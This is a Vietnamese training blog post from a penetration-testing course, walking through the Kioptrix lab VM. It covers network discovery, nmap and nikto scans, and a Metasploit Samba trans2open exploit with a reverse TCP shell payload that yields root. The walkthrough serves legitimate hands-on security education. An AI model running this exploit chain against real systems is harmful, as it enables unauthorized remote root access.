Video Demo trong Khóa học PENTEST + (CEH VIETNAM)

Kioptrix VM Image này là một thử thách tương đối dễ dàng. Mục tiêu của bài thực hành pentest hay hacking này là có được quyền truy cập root thông qua bất kỳ phương tiện nào có thể (ngoại trừ việc thực sự hack máy chủ hoặc trình phát VM). Mục đích của các trò chơi này là để tìm hiểu các công cụ và kỹ thuật cơ bản trong việc đánh giá và khai thác tính dễ bị tổn thương. Có nhiều cách hơn để hoàn thành các thử thách một cách thành công.

Bạn có thể tải xuống từ đây và chạy cài đặt trong máy ảo của mình.

Mục lục

  • Quét mạng
  • Sự liệt kê
  • Khai thác
  • Quyền truy cập root

Hãy bắt đầu!!

Bật máy tấn công của bạn với Kali Linux 2021 hay Parrot OS và sử dụng lệnh netdiscover để quét mạng cục bộ của bạn để lấy IP mục tiêu.

Như hình trên ta thấy IP mục tiêu là 192.168.1.109. Vì vậy, chúng tôi nhắm mục tiêu tại địa chỉ 192.168.1.109 để cho phép liệt kê và quét các cổng và giao thức đang mở. Với sự trợ giúp của tính năng quét tích cực nmap (dùng tùy chọn -A), chúng tôi đã quan sát thấy một số cổng đang mở và dịch vụ đang chạy trên đó.

1nmap -A 192.168.1.109

Có khá nhiều port mở như 22,80,111,139,443 và 1024. Các bạn có thể thử từng dịch vụ. Với port 22 khả năng brute force là có nhưng khó, và thường thì port này hay được tận dụng khi khai thác những dịch vụ khác để lấy được tài khoản, su đó mới truy cập qua SSH port 22 để rồi thâm nhập lcoal và tiến hành leo thang đê lấy quyền root.

Ở đây, các bạn thử nhắm port web , 80. Với port này hãy nhớ ngay các hướng xem page source, xem log in page có không (nếu có thì thử tài khoản default hoặc SQL injection, hoặc cũng có thể tấn công brute force login với hydra …). Tiếp theo đó là enum với nikto, hay tìm thư mục ẩn với dirbuster và gobuster.

Cũng nên tìm xem source web là gì ví dụ wordpress thì dùng thêm wpscan, hay joomscan với joomla. Và dĩ nhiên, không thể thiếu searchsploit và google trong bước này.

Vậy. Chúng ta sẽ sử dụng Nikto để quét lỗ hổng bảo mật với sự trợ giúp của lệnh sau:

1nikto -h http://192.168.1.109

Rất tốt khi thấy nhiều lỗ hổng trong phòng thí nghiệm này.

Vì với sự trợ giúp của cách liệt kê trên, rõ ràng phòng thí nghiệm có thể khai thác theo nhiều hướng và các bạn nên tìm hiểu hướng tiếp cận qua dịch vụ web bằng cách google. Ta sẽ xem thêm port của samba xem sao. Với sự trợ giúp của metasploit và cố gắng tạo máy ảo của mục tiêu.

— Dùng searchsploit tìm xem có thông tin liên quan gì hay không ?

Điều này khai thác lỗi tràn bộ đệm được tìm thấy trong các phiên bản Samba 2.2.0 đến 2.2.8. Mô-đun cụ thể này có khả năng khai thác lỗ hổng trên các hệ thống Linux x86 không có bộ tùy chọn ngăn xếp noexec. LƯU Ý: Một số phiên bản RedHat cũ hơn dường như không dễ bị tấn công vì chúng dường như không cho phép truy cập ẩn danh vào IPC. Lưu ý máy tấn công có IP là 192.168.1.107

1
2
3
4
5
use exploit/linux/samba/trans2openmsf exploit(linux/samba/trans2open)
> set rhost 192.168.1.109msf exploit(linux/samba/trans2open)
> set payload linux/x86/shell_reverse_tcpmsf exploit(linux/samba/trans2open)
> set lhost 192.168.1.107msf exploit(linux/samba/trans2open)
> exploit

B0000MM !! Ở đây chúng ta có lệnh shell của máy nạn nhân có quyền truy cập root.

Còn nhiều cách khác, các bạn hãy thử thêm để đạt được kết quả cao nhất, các thầy sẽ thích khi sinh viên có sự tìm tòi, đào sâu, và sẽ điểm cao hơn.

CEH VIETNAM

Video Demo trong Khóa học PENTEST +


Trả lời

Bạn cần phải đăng nhập để gửi bình luận:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s

%d người thích bài này: